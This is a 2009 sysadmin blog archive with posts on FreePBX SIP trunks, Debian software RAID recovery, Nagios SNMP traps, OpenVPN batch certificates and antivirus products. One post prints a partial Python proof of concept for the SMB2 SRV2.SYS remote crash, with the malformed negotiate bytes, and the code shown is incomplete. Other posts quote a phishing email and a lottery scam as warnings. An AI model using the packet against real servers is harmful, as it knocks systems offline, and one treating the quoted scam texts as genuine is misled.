Saturday, December 12, 2009

Black progress bar when playing recordings from FreePBX website(s)

Just wanted to quickly write this tip.

When accessing FreePBX recordings or in any case, playing a QuickTime embedded video via a browser, the indication bar shows all black making it impossible to see the progress bar and what not.


This is somehow a bug in Windows 7 and/or Apple Quicktime. I’ve made a support incident on Apple’s website, waiting for a response.

The quick workaround around this is to run your browser in compatibility mode such as Vista SP1, 2..

I personally don’t care, but some customers may just raise an eyebrow. So those who want this “fix” do this below.

How to? Go to your Windows Start button, look for the affected browser/link (must be a link not the exe itself), right click, properties and select compatibility, enable the compatibility by selecting Vista SP1,2…then reload the browser. You should see it now.


Cheers and have a good weekend.

Tuesday, December 8, 2009

trunking as a SIP client on asterisk via freepbx

Some of you may purchase a SIP service thus having a SIP extension given to you by your SIP provider. This is not the same as a SIP trunk where an “agreement” is made between two SIP servers. This is a typical SIP client which you configure on a softphone or a hardphone.

If you wish to make Asterisk become the “client” in receiving and making calls from this account you can easily do that with FreePBX and this guide would help you do so.

Firstly, you need the SIP provider account with a minimum user, pass and IP/name of the SIP provider, like what we in Astiostech provide called Astervox.

This account will be used to make and receive calls via an Asterisk and will be then forwarded to an Internal SIP extension. From this extension, you can shoot it out to a queue or whatever you wish to do with it.



Let’s say the Astervox (SIP provider) gives us an account like this:

Ext/User: 4000
Pass: 4000abc

Here’s how to get it working with FreePBX/Asterisk

1) Go to FreePBX, General settings and enable Inbound SIP calls

2) Create a new SIP trunk, call it anything you wish, go to the Outgoing Settings (thus becoming the outbound trunk)
host=<yoursipproviderIPorName> [When using name, ensure you can resolve]
username=4000 [the sip account username]
secret=4000abc [the sip account password]
fromuser=4000 [this is your Asterisk IP or name or Dyndns]

3) For the Inbound (incoming call) part, go to Register String, enter the authentication info again like below and the extension where you wish to shoot the call to.

image [See below for full text]

/1001 is the internal extension that will be dialed when this SIP client 4000 is called (SIP bridging) on the SIP provider. Note, 1001 could also be an Inbound route because 1001 is treated as a DID therefore with an inbound route, you can do more routing and stuff, with it.

4) Save and apply configuration in FreePBX

5) Define Outbound Routes so that you can dial via this Trunk

6) Define Inbound Routes if you like to shoot different CID to different places.

To check if the links/registrations are up, at the command prompt, run:

# asterisk –rx “sip show registry”  [for our inbound - you should see state=registered to your SIP provider]

# asterisk –rx “sip show peers” [for our outbound – you should see status=OK]

Remember! If you are behind a NAT, you must NAT to your Internal Asterisk box UDP/5060 and UDP/10000 to 20000. Otherwise you may get one way audio issues. If required outbound rules also may need to be set and as a minimal the UDP/5060 and the RTP part you should get from your provider, normally with Asterisk its UDP 10000 to 20000.


Friday, December 4, 2009

Debian software RAID made easy

In this guide, we will setup a mirrored pair of a SATA disk straight from the Debian installer process.

Go through all up to the stage of selecting Partition Disks. Select manual and follow the rest of this guide.

1) Create the initial partition by selecting the disks and saying yes to partition them for both disks.

On both disks

2) Select the first FREE SPACE available

3) Create partition like /boot, /swap and / (root) partitions.

In our case, we will setup 2GB for /boot (enable bootflag), 2GB for /swap and the rest is for / (root). Now, we do not need to mirror /swap so our guide will skip that and our RAID will only monitor and mirror /boot and / (root)

When partitioning, under enter Use as, select physical volume for RAID. See screens below;


4) Select use as.


5) Set the boot flag on for /boot for both disks when creating them. For /swap and / (root) you don’t do that. Now, setup /swap and / (root) for both disks as well. Here, since swap is not RAIDed (when selecting -Use as- for the swap partition, select swap area instead) See below for the entire physical architecture.

/boot – use as physical volume for RAID with boot flag on >> becomes sda1 or sdb2

/swap – use as swap >> becomes sda2 or sdb2

/ – use as physical volume for RAID >> becomes sda3 or sdb3


Important: We should have at least a boot, swap and root partition and do this for all other partitions that you want/have.

Enable the RAID virtual volumes

6) Now, select Configure RAID

7) Since we are enabling RAID for 2 partitions, we need to create two Multidisk (MD).


Select Create MD device.


Select RAID1 - Mirror


Select accordingly (in mirroring case would naturally be 2), i select 2


Select spare devices if you have any, i select 0


The first MD, md0, we assign it to /boot which are sda1 and sdb1. The second MD, md1, we assign it to /sda3 and sdb3. The above diagram, we are setting up md0, go through creating a new MD, this time, we are left with the rest unassigned partitions.

Configuring the RAID volumes

Once you’ve set it up correctly, you disk layout should look like this;


Notice, we have RAID 1 device 0 – which is our /boot and we have RAID 1 device 1 which is our / (root).

8) Now in RAID device 0, select #1 and set that up with Ext3 and select mount point /boot.


Now, on RAID device 1, select #1 and set that up with Ext3 and select mount point / (root).

9) Eventually, the disk architecture would look like this;


Beside the SCSI 1 and SCSI 2 devices, we now have RAID1 device 0 and device 1 with /boot and / (root) setup.

10) Finally, select Finish….and continue Debian setup till the end, reboot and now you have a RAID 1 configuration.

PS>> The installer might complain about kernel not knowing this and that. Just continue.

After RAID
To check the status of your raid, run

# cat /proc/mdstat

Disk recovery on software RAID
To resync new disks (due to failure whatever), you must do a couple of things. One involves adding the disk to the M0 and M1 volumes and telling grub to install itself in the new disk that you just installed. Here’s how.

Assuming the first disk (sda) failed, and we have replaced and rebooted the server, here’s what all we need to do.

First, we copy the partition structure from sdb (the exiting non failed one) to sda (the new)

# sfdisk -d /dev/sdb | sfdisk --force /dev/sda

Now, we remove any existing raid configs on this new drive (just in case)

# mdadm --zero-superblock /dev/sda1
# mdadm --zero-superblock /dev/sda2
# mdadm --zero-superblock /dev/sda3

[If you get an error, just ignore, meaning you don’t have existing RAID configs in it]

Now, we add back these partition to the RAID MD volumes accordingly

# mdadm -a /dev/md0 /dev/sda1
# mdadm -a /dev/md1 /dev/sda2
# mdadm -a /dev/md2 /dev/sda3

Now, we would like to see the raid resyncing

# cat /proc/mdstat

After that, we must tell grub to enable itself on the newly added disks.

# grub

[The above grub command will end you up in the grub shell, once in this shell, enter the following info]

grub> root (hd0,0)
grub> setup (hd0)
grub> root (hd1,0)
grub> setup (hd1)
grub> quit

This means, i am setting up grub on hd0 and hd1 and so on if you do other types of raid or have more disks etc.

That should get the recovered disks back to speed. Before rebooting, ensure disk sync is completed, keep running

# cat /proc/mdstat


If the above is happening, it’s still syncing. Don’t reboot yet until these are done.

Good luck.

Monday, November 16, 2009

choice: best SIP softphone for Windows

Ever used soft phones that limit you to many many functions until you “unlock” them by purchasing a full version? Well, we all did and we too frown at those. Softphones such as Zoiper and X-Lite are amongst the famous ones but the lack functionalities on the free edition such as call conferencing, forwarding, sip TCP, sip TLS etc.
Well, after looking through *almost* all the soft phones found in this article, i found one that i would rate almost 9/10 for being FREE + its functionality.
Here’s Phonerlite, winner of the list of softphones (without IM, Video),

Yes, yes, it doesn’t have a fancy skin or 3D images here and there but this piece of software does all what those other free ones want you to pay money for. It lets you do conferencing, forwarding, sipTCP, sipTLS, IPv6, detailed log, phonebook and yes, STATISTICS to see how good/bad the current connection is in real time. Wow, now that’s just awesome.
Those in hurry to get it, here’s link for downloads
There’s a BETA which you can play around with and test. You can also run it straight off a portable device without any installs, with this file
Installation is pretty brain dead, straight forward. They even have a Wizard to setup your account. One thing it lacks is an automatic start but that isn’t much a hassle to do in Windows, just make a shortcut of the executable and drag it into the “Startup” menu in your START menus.
If you do try it and wonder how to conference its easy. When a call comes in, just hit the conference button, dial another extension or as many extensions as you wish and everyone’s conferencing.
To forward, if a call comes, dial another extension, drag and drop the current call to the intended recipient. Careful not to drag drop many calls, this software is not intended to replace a receptionist system such as FOP or a receptionist board.

Sunday, November 8, 2009

Nagios Receive SNMP Traps (with SNMPTT)

SNMPTT (SNMP Trap Translator) interacts with snmptrapd to receive traps and process them into Nagios by matching the IP of the trapping host to a host in Nagios and changing a passive check in Nagios to alert someone.
In the below guide:
[APC-UPS] –>send traps to–> [SNMPTRAPD –> SNMPTT –> NAGIOS]
Here’s a simple guide, adapted and made much more cut and dry (and a little more simpler) from the guide found here.
We use Nagios 3.20, SNMPTT 1.3beta2, Debian Lenny (5)
As usual, your feedback will mean a lot to us. Thanks!
Download some pre-reqs

Main component is SNMP (and some snmp tools) so do this at the CLI
apt-get install snmp snmpd libsnmp-dev
SNMPTT setup starts

1) apt-get install unzip

2) cd /usr/src
3) wget
4) unzip
5) cd Text-ParseWords-3.27
6) perl Makefile.PL
7) make test
8) make install
9) perl -MCPAN -e shell
At the Perl CLI
install YAML
install Getopt::Long
install Config::IniFiles
install Time::HiRes
install Sys::Hostname
install Text::Balanced
install Sys::Syslog
install DBI
install DBD::mysql
install Crypt::DES
install Digest::MD5
install Digest::SHA1
install Digest::HMAC
install Net::SNMP

Download, install and configure snmptt (the magician)

10) cd /usr/src
11) wget
12) tar -zxvf snmptt_1.3beta2.tgz
13) cd snmptt_1.3beta2
14) cp snmptthandler /usr/sbin
15) cp snmptt /usr/sbin
16) cp snmpttconvert /usr/sbin
17) cp snmpttconvertmib /usr/sbin
Configure snmptrapd to not log but send them to snmptt
18) nano /etc/snmp/snmptrapd.conf

19) Enter the following lines in there
traphandle default /usr/sbin/snmptt
disableAuthorization yes
donotlogtraps yes

Configure and enable the snmptrapd as a service
20a) nano /etc/default/snmpd and /etc/init.d/snmpd

TRAPDOPTS='-On -Lsd -p /var/run/'

20b) /etc/init.d/snmpd start
21) netstat -an | grep "162"
>> Should see output

22) cd usr/src/snmptt_1.3beta2
23) cp snmptt.ini /etc/snmp
24) nano /etc/snmp/snmptt.ini, look for and change the following settings
net_snmp_perl_enable = 1

25) cd /usr/src/nagios-plugins-1.4.13/
26) mkdir /usr/local/nagios/libexec/eventhandlers
27) cd /usr/local/nagios/libexec/eventhandlers
28) wget
29) chmod +x submit_check_result
TESTING - Create sample to test
30) cd /usr/share/snmp/mibs
31) wget

32) snmpttconvertmib --in=PowerNet-MIB.mib --out=/etc/snmp/snmptt.conf.apcpower --exec='/usr/local/nagios/libexec/eventhandlers/submit_check_result $r TRAP 1'
Here, the line above, you can change TRAP to any name as long as it matches the Service name in Nagios and 1 is the alert type, 0=OK, 1=WARNING, 2=CRITICAL etc..
33) nano /etc/snmp/snmptt.ini
add the /etc/snmp/snmptt.conf.cpqpower in [TrapFiles], comment out snmptt.conf
Example: Here we added /etc/snmp/snmptt.conf.apcpower based on the snmpttconvertmib outputfile like above

snmptt_conf_files = <<END

Enable log rotation
34) nano /etc/logrotate.conf
This is for log rotation. Add the following line at the end

/var/log/snmp/snmptt.log /var/log/snmp/snmpttunknown.log

35) mkdir /var/log/snmptt
36) touch /var/log/snmptt/snmptt.log
37) touch /var/log/snmptt/snmpttunknown.log
Configuring hosts file
Traps send IP not name, so we must configure /etc/hosts to add the name and ip of the device sending traps to us

38) nano /etc/hosts
Add the following as sample sanjaypc
>> Important! This name will be the same as your hosts.cfg file in nagios that will receive the traps
Send a sample trap: - Load the same MIBs into a program like ireasoning and send a trap to your nagios IP

39) tail -f /var/log/snmptt/snmptt.log
Sun Nov 8 09:09:11 2009 . WARNING "Status Events" - APC UPS: On battery: The UPS has switched to battery backup power.

40) tail -f /var/log/messages --- Output (after configuring Nagios settings below - or at least have a host/service defined that matches sanjaypc and TRAP)
Nov 8 09:09:20 server1 nagios: PASSIVE SERVICE CHECK: sanjaypc;TRAP;1;APC UPS: On battery: The UPS has switched to battery backup power.

Configuring Nagios- Sample definitions

trap-service template

define service{
name generic-service
register 0
check_period 24x7
max_check_attempts 3
normal_check_interval 15
retry_check_interval 5
active_checks_enabled 1
passive_checks_enabled 0
parallelize_check 1
obsess_over_service 0
check_freshness 0
event_handler_enabled 0
flap_detection_enabled 0
process_perf_data 1
retain_status_information 1
retain_nonstatus_information 1
notification_interval 60
notification_period 24x7
notification_options w,u,c,r
notifications_enabled 1

define service{
name trap-service
use generic-service
register 0
service_description TRAP
is_volatile 1
check_command check-host-alive
max_check_attempts 1
normal_check_interval 1
retry_check_interval 1
passive_checks_enabled 1
check_period none
notification_interval 0
contact_groups admins

Create service to host - NOTE: Hostname must match to /etc/hosts definition we created earlier

define service{
host_name sanjaypc
use trap-service
contact_groups admins

41) Restart nagios
42) Send a trap again and check Nagios website, it should turn yellow [WARNING] and a notificaiton sent out

Nagios Send SNMP Traps

We hope this small guide can help you quickly setup your SNMP traps out to a remote management host.
First thing do ensure that your Nagios box has the snmptrap binary and perhaps all other associated SNMP binaries installed. If you haven’t a good start would be to use the following lines:
This guide was made using Nagios 3.2.0, Debian 5
apt-get install snmp snmpd libsnmp-dev
yum install net-snmp net-snmp-utils net-snmp-devel –y
In Nagios, we setup to have SNMP traps to send out to a HP OpenView box in our customer’s corporate network. These traps are sent as Event Handlers in Nagios. You may try doing them as normal notifications (i guess, haven’t tested).
So, each time there’s a state change (e.g. from OK to Warning), you will get, beside the standard notifications, an event that triggers a snmp trap to a remote management host.
To make things simple, we use existing config definitions such as the original commands.cfg and the linux-services.cfg. The following guide attempt to send a trap when there’s more than 2 or 3 users logging onto the nagios (localhost) box.
First, edit the commands.cfg file and add the following lines. I will explain what these lines mean.
define command{
   command_name send_snmptrap
   command_line /usr/bin/snmptrap -v 2c -c public '' NAGIOS-NOTIFY-MIB::nSvcEvent nSvcHostname s "$HOSTNAME$" nSvcDesc s "$SERVICEDESC$" nSvcStateID i $SERVICESTATEID$ nSvcOutput s "$SERVICEOUTPUT$"
Simply copy paste everything and it should actually be single lines something like below;
The command name can be anything you wish, just as long it’s mentioned correctly in the _x_services.cfg files.
/usr/bin/snmptrap –v 2c –c public…
This is quite straightforward, here, we attempt to send SNMPv2 with the community string of public to the remote server
…'' NAGIOS-NOTIFY-MIB::nSvcEvent nSvcHostname s "$HOSTNAME$" nSvcDesc s "$SERVICEDESC$" nSvcStateID i $SERVICESTATEID$ nSvcOutput s "$SERVICEOUTPUT$"
This part above firstly, feeds the Nagios MIBs so that we can use easy readable words such as NSvcDesc instead of OID numbers. It would be a good idea to give the Nagios MIBs to the 3rd party remote monitoring host as well.
[EDIT: UPDATE: – The Nagios MIB has a wrong definition or its actually meant for V2 of Nagios. Use this MIB which should work for V3]
The next few fields are completely up to you and what you wish Nagios to output to the trap receiver. In my case, $HOSTNAME$ – The monitored host, $SERVICEDESC$ – service description, $SERVICESTATEID$ – the Nagios state id like 0 for OK, 1 – for warning etc…and $SERVICEOUTPUT$ – The additional info field from the plug-in is sufficient. You may add more if you like where you deem necessary.
The Macros ($name$) are defined well in Nagios documentation. The n(typeID) are found in the MIB files, so do match them well. Some fields have been changed from Integer (i) to octect string (s) and this may cause your traps to fail. Whatever the case is, you can simulate the trap at the CLI such as
snmptrap -v 2c -c public '' NAGIOS-NOTIFY-MIB::nSvcEvent nSvcStateID s “$SERVICESTATEID$”.
This will give errors as nSvcStateID in the MIB is expecting an Integer value, so changing to
Will then work. Etc..
Now, the command to execute and send traps out is ready. Now we tell which service/host is to execute this command in a state change (triggering the event handler).
Here’s a sample of my linux-services.cfg
define service{
  use                         debian5-linuxservice
  host_name                   Nagios-Server
  service_description         Current Users
  event_handler               send_snmptrap
  event_handler_enabled       1
  check_command               check_local_users!2!3
NOTE: Check local users thresholds are normally much higher but for testing, i just made it warn at 2 users and critical at 3.
The only two parts i added from the normal service definition are;
event_handler            send_snmptrap
event_handler_enabled    1

That’s all is needed for hosts or services to send traps out with the configured output as above when a state change happens.
send_snmptrap is the logical name i created for that command in commands.cfg. Well, that’s about it. Simple right? Now, just restart your nagios to enable the above configs.
/etc/init.d/nagios restart
And test the traps by sending a passive check in Nagios WEB UI to for example, Warning or Critical.
Also, if you would like to test receiving traps, i can recommend you the free iReasoning SNMP toolset. There’s a paid one if you like the rich features of this tool but the free one has limited functions.
Now, for iReasoning, launch the MIB Browser tool. Do load the Nagios MIB to make things much prettier. File >> Load MIBs and select Nagios-Notify-MIB. Now, click on Tools >> Trap Receiver.
In the remote management host value (in my case was enter the IP where iReasoning is running. Ensure your windows firewall enables incoming port UDP 162 for snmptraps if you enable WF.
Trigger something and see it work. See sample from iReasoning below.
NOTE: Whenever you change something in the config files, remember to restart Nagios.
Please do comment and give further suggestions.

Tuesday, October 13, 2009

Did someone ask you to update certificates? Well Don’t!

If you get a mail from just about anyone requesting you to update certificates on your computer. D.O.N.T.
The mail you get may look like this:

On October 16, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour.
The changes will concern security, reliability and performance of mail service and the system as a whole.
For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure.
This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That's all.
Thank you in advance for your attention to this matter and sorry for possible inconveniences.
These are new breed of social engineering that attempts to fool someone into updating their certificates which in turn adds a root certificate of the attacker therefore validating all his websites, software and whatever that uses certificates as VALID.
This would then make it easier for someone to convince you that is actually their own webserver as there won’t be any prompts saying the certificate is invalid.
In Windows, only use Windows Update to update your root certificates. This is done securely by Microsoft and MS is probably the folks you can trust in this case.
If you receive this and you think it could be from an internal IT team, it’s probably not the case. Do get facts and ask your IT Department.

Saturday, September 26, 2009

Office 2010 protects documents from untrusted sources like the internet

Typically, when you open something through MSWord, Excel through direct download, all components within that document such as internet links, scripts or procedures may be enabled (depending on your security levels).

One feature i really like in Office 2010 is the fact that the software “knows” and treat whatever office documents downloaded via the internet and mark them as “public/unsafe”

Documents opened in Protected View (as its called) prevents malicious codes from being executed through sandboxing the application or isolating its process.

When launching a document in this mode, the task manager shows 2 processes of winword.exe (Microsoft word executable binary). Assuming that one of it is the original application running in normal mode but the one with the smaller memory footprint is probably the one being sandboxed (reduced functionality).


Once you’ve accepted to edit, see the ENABLE EDITING button on top right, it will execute the process in normal view and the so called sandboxed version is no longer in memory.


Protected view prevents application attacks that attempt to inject and run code by enabling features such as ASLR, DEP and /GH.

I like this. Helps users be automatically protected, view the content first (incase curiosity gets the better of you) and then decide to “enable” the document in normal view.

Good stuff!

Have a wonderful weekend.

Microsoft Internet Lottery Scam

These guys get smarter. To avoid being tagged spam, they send the main content body through word document. So it sailed pass the Hotmail antispam service and right into my inbox. Anyway, just share with you how ridiculously funny this is.

To top that, it comes from a yahoo address: 




Dear Email Owner,

We are pleased to inform you that you have won a prize money of GBP800,000.00 British Pounds (Eight Hundred Thousand British Pounds) Only for the email users this 2009 Prize promotion which is organized by MICROSOFT, We Collects all the email addresses of people worldwide, that are active online this 2009, among the millions that subscribed to MICROSOFT, HOTMAIL, YAHOO, GMAIL and few from other e-mail providers, 12 people are selected monthly to benefit from this promotion and you are one of the Selected Winners this month of SEPTEMBER 2009.

Your email address has therefore been approved to claim a total sum of (GBP800,000.00 BRITISH POUNDS) in cash.

FILE NUMBER: MIC/903/KPC/0108308/09.

1. Your Full Names:

2. Your Country:

3. Telephone Number:

4. Occupation:

5. Age:

To file for your claim, you are advised to contact our appointed paying bank below without any further delay, because your payment file has been forwarded to them for urgent payment of your winning prize, contact MR. STEPHEN HESTER Below as soon as you receive this massage and remember to forward him the Above File Number And Information’s which will help him to know that you are the rightful beneficiary, then he will instruction you on what to do next to receive your fund.





Tel: +44-703-174-7509

Fax: +44-870-471-8189

Tel/Fax: +44- 844-774-4940

Contact Email:

WARNING: Any Prize that is not claim within 29 working days from the day you where notified will turn void and invalid, and You are advised to keep your winning information confidential until your claims are processed and your fund remitted to your bank account. This is part of our precautionary measure to avoid double claiming and unwarranted abuse of this program by some unscrupulous elements.

For more clarifications, please contact MR. JOHN WILLIAMS through his contact email address:

Congratulations once again,

Mr. Evans Okoli.

Head Customer care Service

Microsoft Promotion Team

Our special thanks and gratitude to Chairman CEO MICROSOFT Bill Gates and his associates we wish you the best of luck. Thank you for being part of our promotional award program and commemorative Anniversary.

© Copyright 2009 Microsoft Lottery promotion All Right Reserve"

Sunday, September 13, 2009

Forefront TMG NIS protects against SMB2.0 attacks

Microsoft has added protection against exploits targeting a vulnerability in the Server Message Block (SMB) implementation in mere hours. However, only customers running the Forefront TMG Network Inspection System can breathe easy. The Redmond-based company informed that the protection against the Critical zero-day vulnerability in SMB 2.0 was the first 0-Day signature release ever introduced to Forefront TMG NIS, according to Avi Ben-Menahem, Group Manager, Network Inspection System.
“In a matter of hours we completed root-cause analysis, signature development, testing and publishing of a new signature snapshot. During this process, which is driven by the Microsoft Malware Protection Center (MMPC), the team was able to demonstrate the agility of the core NIS technology and exercise the technologies and tools built over time to release a signature for theVuln:Win/SMB2.Srv2.DoS!2009-3103 vulnerability in just a few hours,” Ben-Menahem revealed.
Want to try it out? Download here

Wednesday, September 9, 2009

Windows SMB2 'SRV2.SYS' Remote Denial of Service Exploit (and screen shots on Windows 2008 SP2)

There’s a simple exploit code on SMB2 protocol (implemented in the newer OSes of Microsoft) that can easily remote BSDO a Windows server or client. SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used
to identify the SMB dialect that will be used for further communication.


Tried and tested this on Windows 2008 R2 x32 on VirtualBox and it crashed that bad boy the instance i pressed enter. At the time of posting, that same server, which is my AD server (meant for a security seminar in Penang) just won’t boot! anymore…F@!@@!!!…   and LOL at the same time.

I had to boot with “Last known good configuration” and that brought the DC up again.

The exploit was done on Debian.


Also tried it on my x64 Windows 7 (also using SMB2.0) RTM Build 7600 but nothing happened. This means, Microsoft was informed of the bug and fixed it on the RTM build

All credits to Laurent GaffiƩ

Here’s the exploit code. You need to have file and print sharing enabled on Windows as well and of course, the firewall would allow file and print sharing from the network(s) that you are in.

# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
# it dies with a

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
s = socket()

Be responsible, exploit test machines only :D please

Mitigation techniques:

1) Disable SMB / File and Print Sharing (this is tough …i know)
2) Enable host level IDS to detect this signature or custom make your own.
3) Enable firewalls to block SMB traffic from unknown sources (with the hope no one does this in the so called trusted network)

The following platforms are vulnerable ( i didn't test then personally though)

Microsoft Windows Vista x64 Edition SP2
Microsoft Windows Vista x64 Edition SP1
Microsoft Windows Vista x64 Edition 0
Microsoft Windows Vista Ultimate 64-bit edition SP2
Microsoft Windows Vista Ultimate 64-bit edition SP1
Microsoft Windows Vista Ultimate 64-bit edition 0
Microsoft Windows Vista Home Premium 64-bit edition SP2
Microsoft Windows Vista Home Premium 64-bit edition SP1
Microsoft Windows Vista Home Premium 64-bit edition 0
Microsoft Windows Vista Home Basic 64-bit edition SP2
Microsoft Windows Vista Home Basic 64-bit edition SP1
Microsoft Windows Vista Home Basic 64-bit edition 0
Microsoft Windows Vista Enterprise 64-bit edition SP2
Microsoft Windows Vista Enterprise 64-bit edition SP1
Microsoft Windows Vista Enterprise 64-bit edition 0
Microsoft Windows Vista Business 64-bit edition SP2
Microsoft Windows Vista Business 64-bit edition SP1
Microsoft Windows Vista Business 64-bit edition 0
Microsoft Windows Vista Ultimate SP2
Microsoft Windows Vista Ultimate SP1
Microsoft Windows Vista Ultimate
Microsoft Windows Vista Home Premium SP2
Microsoft Windows Vista Home Premium SP1
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic SP2
Microsoft Windows Vista Home Basic SP1
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise SP2
Microsoft Windows Vista Enterprise SP1
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business SP2
Microsoft Windows Vista Business SP1
Microsoft Windows Vista Business
Microsoft Windows 7 for x64-based Systems 0
Microsoft Windows 7 for Itanium-based Systems 0
Microsoft Windows 7 for 32-bit Systems 0
Microsoft Windows 7 beta

And to add from my test, Windows 2008 with SP2.

Microsoft posted this advisory but basically it doesn’t fix anything but just workaround to prevent SMB(2):

Friday, September 4, 2009

openVPN easyrsa batch em "build-key"

We were deploying a solution for our customer, Pizza Hut/KFC Malaysia which deploy pfSense as a VPN gateway and firewall to a little under 300 outlets in Malaysia.

Each outlet has a unique “storeID” which is then required to run OpenVPN daemon at the background and fires a connection whenever a layer 2 link is established.

To create under 300 certificates using OpenVPN’s (v2.x.x) easyrsa scripts on a CentOS clients isn’t funny. So being a lazy ass, i wrote a simple way to help to create these files fast!

Assuming you’ve got the whole works with OpenVPN and pfSense sorted. If not read this great document here. Once you’ve got the server side done on pfSense, you will need to generate more keys for (in this case, Pizza Hut’s) 300 branches peer certificates.

Snail factor

  • Build-key prompts amongst other things the commonName or server name each time a certificate is to be generated

What is needed?

  • To create store certificates that automatically creates the certificates without prompt and also using a $variable$ to “insert” the commonName value. This means, a certificate will be created with the storeID.key and storeID.crt and the storeID.csr

How - Conceptually?

  1. Automate the build-key file to disable prompts
  2. Fire a variable into the system to pickup the $variable$ which then will be the filename and the commonName

How – Technically

(Assumptions – easyrsa is in /etc/openvpn/easyrsa and keys are in /etc/openvpn/easyrsa/keys. In /easyrsa, you have all the scripts like build-ca, build-key)

Create a file called build_batch into /etc/openvpn/easyrsa with the following lines. Make the file executable chmod +x build_batch


if test $# -ne 1; then
echo "usage: batch-build <name>";
exit 1
export KEY_CNAME=$1
./build-key $1

Now, edit (nano/vi) the openssl.cnf file in the /etc/openvpn/easyrsa look for the following lines

commonName            = Common Name (eg, your name or your server\'s hostname)
commonName_max            = 64

Add a new line like below and save the file.

commonName            = Common Name (eg, your name or your server\'s hostname)
commonName_max            = 64

# Add this line below
commonName_default        = $ENV::KEY_CNAME

Now, edit (nano/vi) the build-key in that same directory. At the end of the openssl –req and openssl ca statements, add the –batch argument.

This is how part of the original file look like

openssl req -days 3650 -nodes -new -keyout $1.key -out $1.csr -config $KEY_CONFIG && \
openssl ca -days 3650 -out $1.crt -in $1.csr -config $KEY_CONFIG && \

We modify to add –batch at some part of the line like below and save the file

openssl req -days 3650 -nodes -new -keyout $1.key -out $1.csr -batch -config $KEY_CONFIG && \
openssl ca -days 3650 -out $1.crt -in $1.csr -batch -config $KEY_CONFIG && \

Now you’re ready to run in batch. But before that, please feed the vars in the environment like below in /etc/openvpn/easyrsa

source vars

Run a sample like below

./build_batch test01

This will build the test01.crt, test01.csr and test01.key automatically in /etc/openvpn/easyrsa/keys with the commonName test01 also :)


Now, if you want to do lots of these, use this Excel below


Use the Excel file (build-cert sheet) to generate script lines (see the excel sample) so you can copy and paste into a SSH remote session in the appropriate directory.

Copy in batch up to 50 lines (within buffer) from the copypaster column and paste via a SSH session into the /etc/openvpn/easyrsa and it will generate without prompting anything. Quick and easy.


To remove/revoke certs, do the same but use the Excel’s revoke-cert sheet.


<Ignore CRL/STR_COPY issues, i don’t have CRLs defined>

If things mess up a lot, just run. Warning, this will remove your CA, server and dh information which you then need to repopulate inside pfSense.


After clean-all you must recreate all below


Then re run the above stuff.

Monday, August 24, 2009

Microsoft Security Essentials 1.0 BETA vs. Kaspersky 2010

My colleague Henry asked to scan his USB he suspect a virus is lurking in there. I have both Kaspersky and MSE running in real-time.

MSE detects and Kaspersky snoozed!.

It was Win32/Vorus.CV


And MSE cleans it. I am confident with this product. Since it’s gonna be free, i am a full supporter and advocator of MSE. Use it try and have a trouble free computing environment.

PS> Want a copy of MSE? I can give it to you but you have to write to me for with your email addy.


Saturday, August 22, 2009

Immunet - Antivirus Cloud Computing

Immunet, a startup by Symantec senior execs take Antivirus to the cloud. Immunet attempts to aggregate the results and "opinions" of threats from people using this service. This means, if Bob gets an infection from Saudi Arabia, Immunet alongside your antivirus will then update everyone in this Immunet community about the threat in realtime and get protected from this threat.
They also plan to protect social networking and other communities (probably Twitter, etc..)
Interesting concept. Could Computing Antivirus.

In summary, this is like every single immunet user would then be a possible contributor to protect all other immunet users in realtime.
Checkout their narrative:
Immunet Protect is free, light weight, cloud based Anti-Virus software which uses new approaches to provide malware protection. It is designed to work alongside Symantec, AVG and Mcafee to provide significantly improved detection rates in those products. You can also install it alone. Immunet works by providing its own fast and light layer of cloud based virus detection on top of your existing Anti-Virus product. Once you have Immunet installed it ties you into the Immunet Cloud and allows you to build communities of friends and family. When Immunet Protect detects a threat on your system it automatically makes available protections for it to everyone in your community and to the global community protecting them instantly.
Checkout and download. It doesn’t work on my Windows 7 X64 RTM tho :(. So i had to put it on my XP32 running AVG. Perfect!
Currently, this product works better with those three AV products. I am using Kaspersky + Microsoft Security Essentials Beta, so probably i wont benefit much but probably some security information when a bug/security threat is detected on Windows. (not sure..shall try).
Microsoft Windows XP with Service Pack 2 or later
* 300MHz or faster processor
* 256MB of RAM
* 10 MB of available hard disk space
Microsoft Windows Vista Home Basic/Home Premium
* Supports 32-bit platforms only at this time
* Must meet the minimum Windows Vista operating system requirements
Windows 7 (RC)
* Supports 32-bit platforms only at this time
* Must meet the minimum Windows 7 (RC) operating system requirements
Required for all installations:
* A working Internet connection
Note, this product is a pre-release i.e. BETA, so use with discretion.
Above: Number of people online and threats it can clean!!!, not bad.
INTERESTING. After about 20 minutes into writing this, the protection increases by 2!!!!!…SUPER COOL. There were no updates and downloads of threat patterns. Realtime, hell yeah!
If i click the threat meter..
nsDialogs.dll is apparenly “safe”
Settings and such.
To participate, you need to register. Without registering you wont be able to “help” others :)
Click on register and go get a new account at Then immediately sign in and you should be able to see like below;
Join the cloud? Let us know the experiences.

Thursday, August 13, 2009

My views on free VS. premiere security products.. and Microsoft’s Antivirus?

It's interesting how one AV product suppress the other in just a matter of months. Look at the graphs produced by those so called independent testers. A sample here. Its a big war of AV companies out there.
My problem is, it's sickening to know that we as consumers are always confused with all their gimmicks about free vs premiere/paid editions. You cannot do that with security products! <period>. Give it for 100% or don’t give it at all.
My take on it is, if you want to give something free, give it 100% (and the world shall love you for it). Tearing down features for free Vs. full versions is like saying "you get the car for free but the brakes work only 50%. So be careful. If you want full braking then you need to pay". This is their message and how i see it. This is also why the open source world keeps propelling and gaining mileage. They fall under the GPL which do not allow licenses to be sold, so how they profit? Professional support and services...
